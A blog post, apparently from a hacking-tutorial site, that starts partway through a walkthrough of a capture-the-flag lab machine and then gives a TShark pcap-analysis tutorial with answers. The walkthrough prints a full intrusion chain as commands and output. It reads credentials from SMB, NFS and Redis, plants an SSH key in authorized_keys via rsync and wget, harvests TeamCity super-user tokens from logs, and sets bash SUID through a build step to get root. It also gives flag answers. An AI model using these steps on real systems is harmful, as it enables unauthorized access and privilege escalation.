//10.10.155.145/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    www.kumaratuljaiswal.in www.hackingtruth.in     |
 ===================================================== 


enum4linux complete on Mon May 10 19:27:33 2021

                                                                                                                                      
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ 

I can connect to shares without supplying a password

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ sudo smbclient //10.10.155.145/shares                                                 1 ⨯
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.            
smb: \> ls

  temp                                D        0  Sat Feb  6 17:15:10 2021
  data                                D        0  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275872 blocks available

smb: \> cd temp
smb: \temp\> ls

  services.txt                        N       38  Sat Feb  6 17:15:09 2021

                11309648 blocks of size 1024. 3275872 blocks available
smb: \temp\> get services.txt
getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) 
smb: \temp\> cd ..
smb: \> ls

  temp                                D        0  Sat Feb  6 17:15:10 2021
  data                                D        0  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275868 blocks available
smb: \> cd data
smb: \data\> ls

  data.txt                            N       48  Tue Feb  2 14:51:18 2021
  business-req.txt                    N      190  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275868 blocks available
smb: \data\> get data.txt
getting file \data\data.txt of size 48 as data.txt (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \data\> get business-req.txt
getting file \data\business-req.txt of size 190 as business-req.txt (0.2 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \data\> ls

  data.txt                            N       48  Tue Feb  2 14:51:18 2021
  business-req.txt                    N      190  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275868 blocks available
smb: \data\> cd 
smb: \> pwd
Current directory is \\10.10.155.145\shares\
smb: \> exit
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]

Browsing whole around the SMB services, only one file contains useful information, the services.txt

so, as you can see... downloading and reading this file I find the first flag

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ cat services.txt    
THM{0a09d51e488f5fa105d8d866a497440a}
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ cat data.txt    
Purge regularly data that is not needed anymore
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ cat business-req.txt
We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
If you have any questions, please text or phone us.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$                          

I also found NFS open, so I can look to see if I can mount to anything

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo showmount -e 10.10.155.145               
Export list for 10.10.155.145:
/opt/conf *
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$

Exploit

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ mkdir conf            
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo mount -t nfs 10.10.155.145:/opt/conf conf
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ls
conf
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ cd conf  
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
└─$ ls
hp  init  opt  profile.d  redis  vim  wildmidi
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
└─$ cd redis 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$ ls
redis.conf
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$    

Enumerating the share, we quickly dive down to the Redis directory to find notable information in the redis.conf file..(save this password anywhere)

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$ ls
redis.conf
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$ cat redis.conf 
# Redis configuration file example.
#

# If the master is password protected (using the "requirepass" configuration
# directive below) it is possible to tell the slave to authenticate before
# starting the replication synchronization process, otherwise the master will
# refuse the slave request.
#
# masterauth 

requirepass "B65Hx562F@ggAZ@F"
#
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$ 

REDIS Enumeration : 6379

REDIS the Remote Dictionary Server is an in-memory database we could enumerate Redis with either Netcat, MSF auxiliary scanner or Redis-cli

 

But first you need to install redis-cli in your linux & whatever you have..

apt-get insall redis-tool

using Redis-cli which the best in my opinion we connect to the Redis server using the credentials we found in the mount earlier then query it for the list and content of database it holds

I found a redis password, so I can use this to login to the open redis port

hello myself kumar atul jaiswal and i am a cyber security specialist

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.155.145:6379> keys *
1) "marketlist"
2) "tmp"
3) "internal flag"
4) "int"
5) "authlist"
10.10.155.145:6379> get "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"
10.10.155.145:6379> 
                                

Once again, after trying different commands, I was finally able to access the authlist.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.155.145:6379> keys *
1) "marketlist"
2) "tmp"
3) "internal flag"
4) "int"
5) "authlist"
10.10.155.145:6379> type authlist
list                                                                                                                                            
10.10.155.145:6379> lrange authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                           
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                                       
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                                       
10.10.155.145:6379> 

Decoding the cypher

From the look of it, we can tell that it's encoded in base64. Let's decode it.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d 
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ 

This leads us to rsync; again this is not at all surprising as we saw all these services running in our initial nmap scan.

Enumerating rsync

A quick refresher using --help shows us the switches we need to use.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ rsync -av --list-only rsync://10.10.155.145:873
files           Necessary home interaction
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$

Creating a folder and copying the files

Browsing the directory, we can find user.txt. Other than that, there isn't anything useful here, except for the username. Now we can try to upload a public ssh key to the server and ssh into it.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ mkdir files                                                                                                                  10 ⨯
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ rsync -av rsync://rsync-connect@10.10.155.145:873/files ./rsync                                                              10 ⨯
Password: 
receiving incremental file list
created directory ./rsync
./
sys-internal/
sys-internal/.bashrc
sys-internal/.rediscli_history -> /dev/null
sys-internal/.sudo_as_admin_successful
sys-internal/.xsession-errors.old
sys-internal/user.txt

I can download files, like user.txt, but I also have the ability to upload files. I can upload an authorized_keys file to .ssh that I made so I can login through SSH. To start, I create the keys on my local system

without pass

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ssh-keygen -f ./id_rsa                                                             
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ./id_rsa
Your public key has been saved in ./id_rsa.pub
The key fingerprint is:
SHA256:I7t5fUgaY64/PuMwMpQKdzKt6/b0nnOMyjWauT33GfI hackerboy@KumarAtulJaiswal
The key's randomart image is:
+---[RSA 3072]----+
|                 |
|                 |
|                 |
|   . .           |
|. + = . S        |
| o B   o+..      |
|  o + *=.*..     |
|  .+ X+B@ooo.    |
| oo.O+O@+=E.     |
+----[SHA256]-----+
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ 

With this created, I change the named of id_rsa.pub to authorized_keys then upload the file.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ls                                                                                                                                    
id_rsa  id_rsa.pub  
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo cp id_rsa.pub authorized_keys                                                 
[sudo] password for hackerboy: 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ls
authorized_keys id_rsa  id_rsa.pub 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$

with this password Hcg3HP67@TW@Bc72v

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ rsync -ahv ./id_rsa.pub rsync://rsync-connect@10.10.155.145:873/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g
Password: 
sending incremental file list
id_rsa.pub

sent 674 bytes  received 35 bytes  18.42 bytes/sec
total size is 580  speedup is 0.82
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ 

Other Method for Uploading a File

with python3 we are doing a file transfer with this command

python3 -m http.server 1234

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ python3 -m http.server 1234                                                                                                            10 ⨯
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
10.8.61.234 - - [10/May/2021 23:15:41] "GET / HTTP/1.1" 200 -
10.8.61.234 - - [10/May/2021 23:15:41] code 404, message File not found
10.8.61.234 - - [10/May/2021 23:15:41] "GET /favicon.ico HTTP/1.1" 404 -
10.10.155.145 - - [10/May/2021 23:16:15] "GET /authorized_keys HTTP/1.1" 200 -
^C  
Keyboard interrupt received, exiting.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ 

then go to in our browser and type in the search bar 10.8.61.234:1234 (with own IP and port which is used to above the command). 

and download in vulnerable machine(sys-internal@vulnet-internal) via wget command. (Note - wget tool already installed in sys-internal machine except curl)

sys-internal@vulnnet-internal:~/.ssh$ wget http://10.8.61.234:1234/authorized_keys
--2021-05-10 14:16:10--  http://10.8.61.234:1234/authorized_keys
Connecting to 10.8.61.234:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 580 [application/octet-stream]
Saving to: ‘authorized_keys.1’

authorized_keys                 100%[===========================================================>]     580  --.-KB/s    in 0s      

2021-05-10 14:16:11 (76.5 MB/s) - ‘authorized_keys.1’ saved [580/580]

sys-internal@vulnnet-internal:~/.ssh$ ls
authorized_keys  authorized_keys
sys-internal@vulnnet-internal:~/.ssh$ 

I can now login as sys-internal through SSH in our machine.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ssh -i id_rsa sys-internal@10.10.155.145
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon May 10 13:57:55 2021 from 10.8.61.234
sys-internal@vulnnet-internal:~$ whoami
sys-internal
sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
sys-internal@vulnnet-internal:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
sys-internal@vulnnet-internal:~$ 

Privilege Escalation

Manually enumerating, I find a directory under / named TeamCity. Looking at this, I see it is running a webserver

and

cat TeamCity-readme.txt

sys-internal@vulnnet-internal:~$ cd /TeamCity
sys-internal@vulnnet-internal:/TeamCity$ ls
bin          buildAgent  devPackage  licenses  service.properties   temp                webapps
BUILD_85899  conf        lib         logs      TeamCity-readme.txt  Tomcat-running.txt  work
sys-internal@vulnnet-internal:/TeamCity$ cat  TeamCity-readme.txt
This is the JetBrains TeamCity home directory.

For evaluation purposes, we recommend running both server and agent. If you need to run only the TeamCity server, execute:
* On Windows: `.\bin\teamcity-server.bat start`
* On Linux and macOS: `./bin/teamcity-server.sh start`
sys-internal@vulnnet-internal:/TeamCity$
sys-internal@vulnnet-internal:/TeamCity$

sys-internal@vulnnet-internal:/TeamCity$
sys-internal@vulnnet-internal:/TeamCity$ ss | grep 8111
tcp  ESTAB      0       0                          [::ffff:127.0.0.1]:58689                                 [::ffff:127.0.0.1]:8111                             
tcp  CLOSE-WAIT 1       0                          [::ffff:127.0.0.1]:39595                                 [::ffff:127.0.0.1]:8111                             
tcp  ESTAB      0       0                          [::ffff:127.0.0.1]:8111                                  [::ffff:127.0.0.1]:58689                            
sys-internal@vulnnet-internal:/TeamCity$ 

I can set up an SSH port forwarding so I can access port 8111 on my localhost

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ssh sys-internal@10.10.155.145 -i id_rsa -L 8111:localhost:8111
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon May 10 14:20:06 2021 from 10.8.61.234
sys-internal@vulnnet-internal:~$ 

Now when I go to localhost:8111 I can connect to TeamCity and it is running version 2.2.

sys-internal@vulnnet-internal:/TeamCity$ grep -r "authentication token"
grep: temp/jna-3506402: Permission denied
grep: webapps/ROOT/plugins/TeamCity.SharedResources: Permission denied
grep: webapps/ROOT/plugins/data-dir-browse: Permission denied
grep: webapps/ROOT/plugins/coverage: Permission denied

logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)

sys-internal@vulnnet-internal:/TeamCity$ 

authentication token 8070510537629599387

I found several authentication tokens under logs/catalina.out. Using these, I can login. Poking around, I find I can create a new build.

First Creating a new build, I can run a build step and execute python. My first thought was to throw in a python reverse shell but this did not work. so, don't worry we have a 2nd solution.

Since TeamCity is running as root, whatever connection we can get it to spawn will be with root permissions, we immediately started to poke for console pages/terminal or anything that be used to run system commands

After a while we figured you can create a project then build configuration, skipping the question for “New VCS Root”,

After creating a build configuration
choose “Build Steps” on the left menu to add a build step,

Choose the runner type “Python”. Choose command as custom script

then place in the custom script section we write a some simple script..

I can change an SUID to elevate my privileges. Since bash is the easiest, I chose to do that.

import os

os.system("chmod +s /bin/bash")

After saving this build and running it, I go back to SSH session.

 Here, I see /bin/bash permissions have changed.

sys-internal@vulnnet-internal:/TeamCity$ 
sys-internal@vulnnet-internal:/TeamCity$ cd 
sys-internal@vulnnet-internal:~$ ls /bin/bash
/bin/bash
sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
sys-internal@vulnnet-internal:~$ ls /bin/bash
/bin/bash
sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
sys-internal@vulnnet-internal:~$ 

I can now elevate my privileges to root..

As root, I can read root.txt

sys-internal@vulnnet-internal:~$ 
sys-internal@vulnnet-internal:~$ cd /bin/bash
-bash: cd: /bin/bash: Not a directory
sys-internal@vulnnet-internal:~$ 
sys-internal@vulnnet-internal:~$ /bin/bash -p
bash-4.4# whoami
root
bash-4.4# #kumaratuljaiswal.in
bash-4.4# 
bash-4.4# cat /root/root.txt
THM{e8996faea46df09dba5676dd271c60bd}
bash-4.4# 

Finally we won!! Thanks for supporting :-)

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

 

Tshark

Bored with trying to extract packets by hand? Need to get info from a pcap file that doesn't extract easily from Wireshark? Are GUIs for losers but now you realized you can't open Wireshark? Well my friend, TShark is the solution to all your problems.

Installation

Before beginning, we need to make sure we have tshark installed on our host - If you are using the AttackBox you can skip this, as it already has tshark installed.

Generally, tshark is installed with Wireshark. But let's verify it's installed anyway. Run the command below to determine if it's installed or not.

apt list tshark


In my output above, we can see that it is installed. If it's not installed, sudo apt install tshark will do the trick.

The tshark program is also available in a Windows installation as tshark.exe in the Wireshark install directory.

Try running tshark -h to get the help output to make sure we can access the program properly. 

Download Capture File :- Click Here

Download Capture File :- Click Here

This task uses the dns.cap capture file on the Wireshark SampleCaptures wiki page.

To read a file with TShark, we will use the -r switch. This will display a summary line of each packet similar to tcpdump output and is useful to identify high-level information about the capture.



tshark -r dns.cap



When paired with wc -l, we can quickly identify how many packets are in a capture.


tshark -r dns.cap | wc -l




We can utilize Wireshark display filters (which are DIFFERENT than bpf syntax) to narrow down what packets are displayed. If we're interested in DNS A records only, we can use the dns.qry.type == 1 display filter to narrow down our packets. Display filters are added using the -Y switch. Our command below will show all of the A records in our capture, including responses.



tshark -r dns.cap -Y "dns.qry.type == 1"




The power of TShark comes with combining traditional Wireshark filters with extraction. We can extract specific field values directly from the pcap, allowing us to have only the interesting fields returned. One way to extract data is using the -T fields and -e [fieldname] switches. To extract the A records in the pcap, we would use -T fields -e dns.qry.name at the end of our previous tshark command. This makes our command the one below:



tshark -r dns.cap -Y "dns.qry.type == 1" -T fields -e dns.qry.name

NOTE: An easy way to identify field names in Wireshark is to navigate to the Packet Details in the capture, highlight the interesting field, then view the bottom left corner.

1) How many packets are in the dns.cap file?

Command :- tshark -r cap | wc -l

Ans:- 38

2) How many A records are in the capture? (Including responses)
 

Command :- tshark -r cap -Y "dns.qry.type == 1"

Ans:- 6

3) Which A record was present the most?

Command :- tshark -r cap -Y "dns.qry.type == 1" -T fields -e dns.qry.name

 

Ans:- GRIMM.utelsystems.local

File :- Pcap ( above the link )

The following seven pillars constitute the foundation of this life-changing course:can you find it?

Use the attached file to analyze in Wireshark and TShark to find the exfiltrated data. As you identify suspicious items in Wireshark, pivot to TShark to extract relevant information.

Remember, we can filter out irrelevant packets with the -Y switch using display filters.

1) How many packets are in this capture?

Command :-  tshark -r pcap | wc -l

Ans :- 125

2) How many DNS queries are in this pcap? (Not responses!)


Command :-  tshark -r pcap -Y "dns.flags.response == 0" | wc -l

Ans :- 56

3) What is the DNS transaction ID of the suspicious queries (in hex)?

Command :- tshark -r pcap -Y "dns.qry.type == 1"

Ans :- 0xbeef

4) What is the string extracted from the DNS queries?

Command :-  tshark -r pcap -Y "dns.qry.type == 1" | grep -v 'unreachable' | cut -d 'A' -f 2 | cut -d '.' -f 1


MMZZWWGGCCZZ3333OORRUUDDCC442277NNFFZZVV6655BQQBOOV

VTTWWQQXX33XXNNFF22GGQQMMDDVVGG55PPXXII4433IIGGRRZZ

remove the duplicates (e.g. MM -> M, 3333 -> 33) leaves us with:

Ans :- MZWGCZ33ORUDC427NFZV65BQOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5

5) What is the flag?

Command

echo "MZWGCZ33ORUDC427NFZV65BQOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5" | base32 -d
 

Ans :- flag{th1s_is_t0ugh_with0u7_tsh4rk!}

Optional for this post (wireshark) - Put http.request.method == "POST" in the display filter of wireshark to only show POST requests. Click on the packet, then expand the Hypertext Transfer Protocol field. The POST data will be right there on top.

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)